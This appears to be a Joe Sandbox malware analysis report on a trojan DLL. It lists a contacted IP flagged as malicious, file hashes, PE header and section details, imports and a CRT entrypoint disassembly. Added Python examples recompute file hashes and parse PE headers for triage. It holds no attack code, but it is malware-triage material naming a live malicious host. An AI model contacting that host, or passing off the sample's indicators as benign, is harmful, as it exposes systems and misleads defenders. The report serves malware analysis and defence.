IP | Domain | Country | ASN | ASN Name | Malicious
23.239.0.12 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
IP
192.168.2.1
127.0.0.1
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:626492
Start date and time: 14/05/2022 05:00:36 (2022-05-14 05:00:36 +02:00)
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:2V7zjcga5L.dll
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Run name:Run with higher sleep bypass
Number of new started processes analysed: 22
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal76.troj.evad.winDLL@19/5@0/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 40
                            • Number of non-executed functions: 196
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Adjust boot time
                            • Enable AMSI
                            • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
Time       Type              Description
05:02:18   API Interceptor   1x Sleep call for process: svchost.exe modified
Context for IP 23.239.0.12 (other analyses that contacted the same address):
Match          Associated Sample Name / URL   Detection
23.239.0.12    vur7t4SumQ.dll                 malicious
               3j6e3XaMWM.dll                 malicious
               wgJ5YjI2QO.dll                 malicious
               r0hiaXHscs.dll                 malicious
               TSvDnT6fkE.dll                 malicious
               Plt3z2W7KQ.dll                 malicious
               2V7zjcga5L.dll                 malicious
               RuqTBW6t32.dll                 malicious
               yj81rxDZIp.dll                 malicious
               3j6e3XaMWM.dll                 malicious
               wgJ5YjI2QO.dll                 malicious
               r0hiaXHscs.dll                 malicious
               TSvDnT6fkE.dll                 malicious
               x4ByCNJqst.dll                 malicious
               Xp7X1Yf3CM.dll                 malicious
               RuqTBW6t32.dll                 malicious
               yj81rxDZIp.dll                 malicious
               x4ByCNJqst.dll                 malicious
               lc4KFeS296.dll                 malicious
               36yjawe0S4.dll                 malicious
Domains: No context
Context for ASN LINODE-AP Linode LLC US (other analyses that contacted this provider):
Match                      Associated Sample Name / URL   Detection   Context
LINODE-AP Linode LLC US    vur7t4SumQ.dll                 malicious   23.239.0.12
                           3j6e3XaMWM.dll                 malicious   23.239.0.12
                           wgJ5YjI2QO.dll                 malicious   23.239.0.12
                           r0hiaXHscs.dll                 malicious   23.239.0.12
                           TSvDnT6fkE.dll                 malicious   23.239.0.12
                           Plt3z2W7KQ.dll                 malicious   23.239.0.12
                           2V7zjcga5L.dll                 malicious   23.239.0.12
                           RuqTBW6t32.dll                 malicious   23.239.0.12
                           yj81rxDZIp.dll                 malicious   23.239.0.12
                           3j6e3XaMWM.dll                 malicious   23.239.0.12
                           wgJ5YjI2QO.dll                 malicious   23.239.0.12
                           r0hiaXHscs.dll                 malicious   23.239.0.12
                           TSvDnT6fkE.dll                 malicious   23.239.0.12
                           x4ByCNJqst.dll                 malicious   23.239.0.12
                           Xp7X1Yf3CM.dll                 malicious   23.239.0.12
                           RuqTBW6t32.dll                 malicious   23.239.0.12
                           yj81rxDZIp.dll                 malicious   23.239.0.12
                           x4ByCNJqst.dll                 malicious   23.239.0.12
                           lc4KFeS296.dll                 malicious   23.239.0.12
                           36yjawe0S4.dll                 malicious   23.239.0.12
Context for JA3 fingerprint 51c64c77e60f3980eea90869b68c58a8 (other analyses whose TLS client hello produced the same fingerprint):
Match                               Associated Sample Name / URL   Detection   Context
51c64c77e60f3980eea90869b68c58a8    vur7t4SumQ.dll                 malicious   23.239.0.12
                                    3j6e3XaMWM.dll                 malicious   23.239.0.12
                                    wgJ5YjI2QO.dll                 malicious   23.239.0.12
                                    r0hiaXHscs.dll                 malicious   23.239.0.12
                                    TSvDnT6fkE.dll                 malicious   23.239.0.12
                                    Plt3z2W7KQ.dll                 malicious   23.239.0.12
                                    2V7zjcga5L.dll                 malicious   23.239.0.12
                                    RuqTBW6t32.dll                 malicious   23.239.0.12
                                    yj81rxDZIp.dll                 malicious   23.239.0.12
                                    3j6e3XaMWM.dll                 malicious   23.239.0.12
                                    wgJ5YjI2QO.dll                 malicious   23.239.0.12
                                    r0hiaXHscs.dll                 malicious   23.239.0.12
                                    TSvDnT6fkE.dll                 malicious   23.239.0.12
                                    x4ByCNJqst.dll                 malicious   23.239.0.12
                                    Xp7X1Yf3CM.dll                 malicious   23.239.0.12
                                    RuqTBW6t32.dll                 malicious   23.239.0.12
                                    yj81rxDZIp.dll                 malicious   23.239.0.12
                                    x4ByCNJqst.dll                 malicious   23.239.0.12
                                    lc4KFeS296.dll                 malicious   23.239.0.12
                                    36yjawe0S4.dll                 malicious   23.239.0.12
Dropped files: No context
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.3593198815979092
                                                                    Encrypted:false
                                                                    SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                    MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                    SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                    SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                    SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                    Malicious:false
                                                                    Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
File Type:MPEG-4 LOAS (libmagic signature match only; the BITS download-manager path visible in the preview suggests one of the transfer-queue database files that the BITS service host keeps in that directory, not audio)
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.24944658171762518
                                                                    Encrypted:false
                                                                    SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4h:BJiRdwfu2SRU4h
                                                                    MD5:8AAEAD3A5764ACEE115E577550F0598A
                                                                    SHA1:95DC5C13113E112318E381C621CBEFFBCD59375F
                                                                    SHA-256:6703C60D01E2D70EC341882EF346FD68EE2E7A31A94C69094F1AEF8E69058529
                                                                    SHA-512:3675FFAE9E44B4148C17ED61A701711A496D3A65D0A762ED386700CA3EDC7D84FF2FF7852D948C7152CA84F516CF881865D79018E3F7B179F792AB07877EE834
                                                                    Malicious:false
                                                                    Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x15eee0d4, page size 16384, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):786432
                                                                    Entropy (8bit):0.2506244304664288
                                                                    Encrypted:false
                                                                    SSDEEP:384:AwgwE+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:AreSB2nSB2RSjlK/+mLesOj1J2
                                                                    MD5:0E643821CBC46201357DE2E2764807BC
                                                                    SHA1:54E2310338E05A004178315EFE7AA0EC4A5F2724
                                                                    SHA-256:E66B471D6B354C0DC6D03C63098635FACC007CD5D12981DB2F86C59428C955C9
                                                                    SHA-512:77247C14BF56E88E1E08E244E853AAE665304C50B2CB80DB9AEE54FF1A75324C2D23DD8254CB5982F89814D638DACE08C73EB44A2D3BDA7258FC0AEB01A987D1
                                                                    Malicious:false
                                                                    Preview:....... ................e.f.3...w........................)..........z.......z..h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... .....................................................................................................................................................................................................................................................3......z...................5Z......z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
File Type:SysEx File - (libmagic signature match only; at 16384 bytes, the page size of the ESE database dropped by the same svchost.exe, and with the same zero-padded layout as the other svchost.exe drops, this is more plausibly a companion file of that database than MIDI data)
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07693076787038865
                                                                    Encrypted:false
                                                                    SSDEEP:3:ttllJ7v2afw6cfAYaAtAW//lfhRwll3Vkttlmlnl:vllJr2aY6cTz/tY3
                                                                    MD5:0A7FD227FC2D7666779C78978B525C26
                                                                    SHA1:1620116DBB50AE61AC0172E5931A34559A540A47
                                                                    SHA-256:0F2E9DDA6684EC2CF19DE3FD1B106C848ED50E7413D2FF9E3970C2C1EB4D2935
                                                                    SHA-512:E306B268680AB46531210FF6A5F24CCC6DC5526A5D0AD8977FB0BA732378A641C519CB224BA5C6B860F30ADD5C702D9F6B742D87B1F2486ED6A45D09CA112C07
                                                                    Malicious:false
                                                                    Preview:.pX......................................3...w.......z.......z...............z.......z....f......z=a.................5Z......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
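The dropped-file entries above are identified by size, 8-bit entropy and four digests. As an added example, not part of the Joe Sandbox report, the following Python recomputes those identifiers so a file pulled from the same path on a live host can be checked against the report. Its input is the 55-byte JSON file from the last entry, whose preview is its complete content; the entropy thresholds behind the triage label are this example's own assumptions, not the sandbox's "Encrypted" heuristic.

```python
import hashlib
import math
from collections import Counter

# Constructed input: the 55-byte ASCII file from the last dropped-file entry above; its
# "Preview" is the whole file (no line terminators), so its hashes can be checked against the report.
SAMPLE_JSON = b'{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}'

# Assumed thresholds for the triage label (this example's choice, not the sandbox's "Encrypted" test):
# near-zero entropy means mostly padding, above ~7.2 bits per byte suggests packed or encrypted content.
PADDING_MAX = 1.0
PACKED_MIN = 7.2


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the quantity in the report's 'Entropy (8bit)' row."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_identifiers(data):
    """Size, entropy and the four digests in the upper-case hex form the report prints."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def triage_label(entropy):
    """Coarse hint from entropy alone about what a drop probably is; not a verdict."""
    if entropy < PADDING_MAX:
        return "mostly-padding"
    if entropy > PACKED_MIN:
        return "possibly-packed-or-encrypted"
    return "plain"


def check_against_report(data, reported):
    """Names of the identifiers that disagree with the report's values; empty when it is the same file."""
    ours = file_identifiers(data)
    mismatches = []
    for key, value in reported.items():
        if key == "entropy":
            same = abs(ours[key] - value) < 1e-9
        elif isinstance(value, str):
            same = ours[key] == value.upper()
        else:
            same = ours[key] == value
        if not same:
            mismatches.append(key)
    return mismatches


if __name__ == "__main__":
    reported = {"size": 55, "entropy": 4.306461250274409,
                "md5": "DCA83F08D448911A14C22EBCACC5AD57"}   # values from the report entry above
    ids = file_identifiers(SAMPLE_JSON)
    print(ids, triage_label(ids["entropy"]))
    print("mismatches:", check_against_report(SAMPLE_JSON, reported))
```

The near-zero entropies of the four svchost.exe drops above (0.08 to 0.36) are what the label reports as padding-dominated, which fits database pages that are mostly empty; the 6.48 of the submitted DLL is typical of unpacked native code, so entropy alone gives no reason to expect a packed payload in it.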
                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.482069712713154
                                                                    TrID:
                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                    File name:2V7zjcga5L.dll
                                                                    File size:545280
                                                                    MD5:b65d38f56203a50c2354abaa5af38aa4
                                                                    SHA1:81fb867e785b6e8505ca59b5de7f46d598a37fc3
                                                                    SHA256:18ad1fa8e0dcb3b64ff7ef042649fdc602668b4a0978f0351c98177162916139
                                                                    SHA512:134a8767bd463ee4481731c313618703ef9d925b8ddb911b6eea59d1b9fae7e912ddc86be65145e67c9bb97c4e9e3de5747c43bca5b9016189b183807e42c45b
                                                                    SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZbHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVz
                                                                    TLSH:CFC4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                    Icon Hash:74f0e4ecccdce0e4
                                                                    Entrypoint:0x1800423a8
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x180000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:2
                                                                    File Version Major:5
                                                                    File Version Minor:2
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:2
                                                                    Import Hash:b268dbaa2e6eb6acd16e04d482356598
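The static fields above (entrypoint, image base, time stamp, characteristics, subsystem and version numbers) are read straight from the PE headers. As an added example, not from the report or the sandbox vendor, the following Python reads those fields from a PE32+ image with the standard library only, maps the entry point to its section, and recomputes the header checksum the way imagehlp's CheckSumMappedFile does, so a stored value that disagrees with it stands out. It runs against a constructed, header-only DLL image carrying the values listed above; that blob is not the analysed sample, and the flag tables cover only the bits this example needs.

```python
import struct
from datetime import datetime, timezone

# Only the bits this example needs; names follow the report's rows.
MACHINE = {0x014C: "i386", 0x8664: "x86-64"}
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
                       0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF"}
SUBSYSTEM = {2: "windows gui", 3: "windows cui"}


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_checksum(data, checksum_offset):
    """Header checksum as imagehlp CheckSumMappedFile computes it: 16-bit little-endian words
    summed with end-around carry, the CheckSum field itself skipped, plus the file length."""
    length = len(data)
    if length % 2:
        data = data + b"\x00"                                  # odd trailing byte is zero-extended
    total = 0
    for off in range(0, len(data), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue
        total += int.from_bytes(data[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + length) & 0xFFFFFFFF


def parse_pe_headers(data):
    """Static fields of a PE32+ image: DOS header -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 24                                          # optional header start
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("not PE32+")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    ss_major, ss_minor = struct.unpack_from("<HH", data, opt + 48)
    stored_checksum = struct.unpack_from("<I", data, opt + 64)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    entry_section = None                                       # section whose VA range holds the entry point
    for i in range(nsections):
        sec = opt + opt_size + 40 * i
        vsize, vaddr = struct.unpack_from("<II", data, sec + 8)
        if vaddr <= entry_rva < vaddr + vsize:
            entry_section = data[sec:sec + 8].rstrip(b"\0").decode("ascii", "replace")
    return {
        "machine": MACHINE.get(machine, hex(machine)),
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "image_base": image_base,
        "entry_point": image_base + entry_rva,
        "entry_section": entry_section,
        "subsystem": SUBSYSTEM.get(subsystem, str(subsystem)),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "os_version": f"{os_major}.{os_minor}",
        "subsystem_version": f"{ss_major}.{ss_minor}",
        "stored_checksum": stored_checksum,
        "computed_checksum": pe_checksum(data, opt + 64),
    }


def set_checksum(data):
    """Copy of the image with a valid CheckSum, as a linker run with /RELEASE would write it."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    field = pe_off + 24 + 64
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, field, pe_checksum(data, field))
    return bytes(fixed)


def build_sample_dll():
    """Constructed header-only PE32+ DLL (not the analysed sample) carrying the values listed above."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0x627D8598, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                       # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x423A8)                    # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x180000000)                # ImageBase
    struct.pack_into("<HH", opt, 40, 5, 2)                      # OS version 5.2
    struct.pack_into("<HH", opt, 48, 5, 2)                      # subsystem version 5.2
    struct.pack_into("<HH", opt, 68, 2, 0x0140)                 # WINDOWS_GUI, DYNAMIC_BASE | NX_COMPAT
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    text = b".text".ljust(8, b"\0") + struct.pack("<IIIIIIHHI", 0x50000, 0x1000, 0x50000, 0x400, 0, 0, 0, 0, 0x60000020)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text
    return image + b"\0" * (512 - len(image))                  # pad to one file-alignment unit


if __name__ == "__main__":
    for key, value in parse_pe_headers(build_sample_dll()).items():
        print(f"{key}: {value:#x}" if isinstance(value, int) else f"{key}: {value}")
```

On a real file, call parse_pe_headers(open(path, "rb").read()). A stored_checksum of 0 is the normal case for binaries linked without /RELEASE; a non-zero value that differs from computed_checksum means the image was changed after the linker wrote the field, which is common in patched or hand-edited malware and is worth recording alongside the time stamp, since both are cheap to forge but rarely are.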
Instruction (entrypoint disassembly; the 64-bit code is shown as decoded by a 32-bit disassembler, so each leading "dec eax", "dec ecx", "dec esp" or "inc ebp" is a REX prefix byte, 0x48, 0x49, 0x4C or 0x45, belonging to the instruction that follows it, and esp/eax-style names stand for the 64-bit registers rsp/rax; the sequence matches the standard MSVC DllMain CRT entry stub: it saves rbx, rsi and rdi, keeps the three arguments in rsi, ebx and rdi, calls a one-time initialiser only when the reason argument in edx equals 1, DLL_PROCESS_ATTACH, then restores the registers and tail-jumps to the real dispatcher)
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec eax
                                                                    mov dword ptr [esp+10h], esi
                                                                    push edi
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec ecx
                                                                    mov edi, eax
                                                                    mov ebx, edx
                                                                    dec eax
                                                                    mov esi, ecx
                                                                    cmp edx, 01h
                                                                    jne 00007F57B0A17F47h
                                                                    call 00007F57B0A1A0D4h
                                                                    dec esp
                                                                    mov eax, edi
                                                                    mov edx, ebx
                                                                    dec eax
                                                                    mov ecx, esi
                                                                    dec eax
                                                                    mov ebx, dword ptr [esp+30h]
                                                                    dec eax
                                                                    mov esi, dword ptr [esp+38h]
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop edi
                                                                    jmp 00007F57B0A17DF0h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ecx
                                                                    dec eax
                                                                    sub esp, 00000088h
                                                                    dec eax
                                                                    lea ecx, dword ptr [00014D05h]
                                                                    call dword ptr [0000FC7Fh]
                                                                    dec esp
                                                                    mov ebx, dword ptr [00014DF0h]
                                                                    dec esp
                                                                    mov dword ptr [esp+58h], ebx
                                                                    inc ebp
                                                                    xor eax, eax
                                                                    dec eax
                                                                    lea edx, dword ptr [esp+60h]
                                                                    dec eax
                                                                    mov ecx, dword ptr [esp+58h]
                                                                    call 00007F57B0A26ACAh
                                                                    dec eax
                                                                    mov dword ptr [esp+50h], eax
                                                                    dec eax
                                                                    cmp dword ptr [esp+50h], 00000000h
                                                                    je 00007F57B0A17F83h
                                                                    dec eax
                                                                    mov dword ptr [esp+38h], 00000000h
                                                                    dec eax
                                                                    lea eax, dword ptr [esp+48h]
                                                                    dec eax
                                                                    mov dword ptr [esp+30h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [esp+40h]
                                                                    dec eax
                                                                    mov dword ptr [esp+28h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [00014CB0h]
                                                                    dec eax
                                                                    mov dword ptr [esp+20h], eax
                                                                    dec esp
                                                                    mov ecx, dword ptr [esp+50h]
                                                                    dec esp
                                                                    mov eax, dword ptr [esp+58h]
                                                                    dec eax
                                                                    mov edx, dword ptr [esp+60h]
                                                                    xor ecx, ecx
                                                                    call 00007F57B0A26A78h
                                                                    jmp 00007F57B0A17F64h
                                                                    dec eax
                                                                    mov eax, dword ptr [eax+eax+00000000h]
                                                                    Programming Language:
                                                                    • [ C ] VS2008 build 21022
                                                                    • [LNK] VS2008 build 21022
                                                                    • [ASM] VS2008 build 21022
                                                                    • [IMP] VS2005 build 50727
                                                                    • [RES] VS2008 build 21022
                                                                    • [EXP] VS2008 build 21022
                                                                    • [C++] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x55cf0 | 0x6f | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5544c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5a000 | 0x2dffc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x59000 | 0xe1c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0x1d8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x52000 | 0x288 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x504ca | 0x50600 | False | 0.389081940124 | zlib compressed data | 5.26882252971 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x52000 | 0x3d5f | 0x3e00 | False | 0.355216733871 | data | 5.3916243397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x56000 | 0x20d8 | 0x1200 | False | 0.180772569444 | data | 2.18161586025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata | 0x59000 | 0xe1c | 0x1000 | False | 0.44580078125 | data | 4.98556265168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5a000 | 0x2dffc | 0x2e000 | False | 0.839408542799 | data | 7.73448363752 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x88000 | 0x6f8 | 0x800 | False | 0.1796875 | data | 1.81179169858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_RCDATA | 0x5a0a0 | 0x2de00 | data | English | United States
RT_MANIFEST | 0x87ea0 | 0x15a | ASCII text, with CRLF line terminators | English | United States
DLL | Import
KERNEL32.dll | ExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
ole32.dll | CoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
Name | Ordinal | Address
DllRegisterServer | 1 | 0x180042050
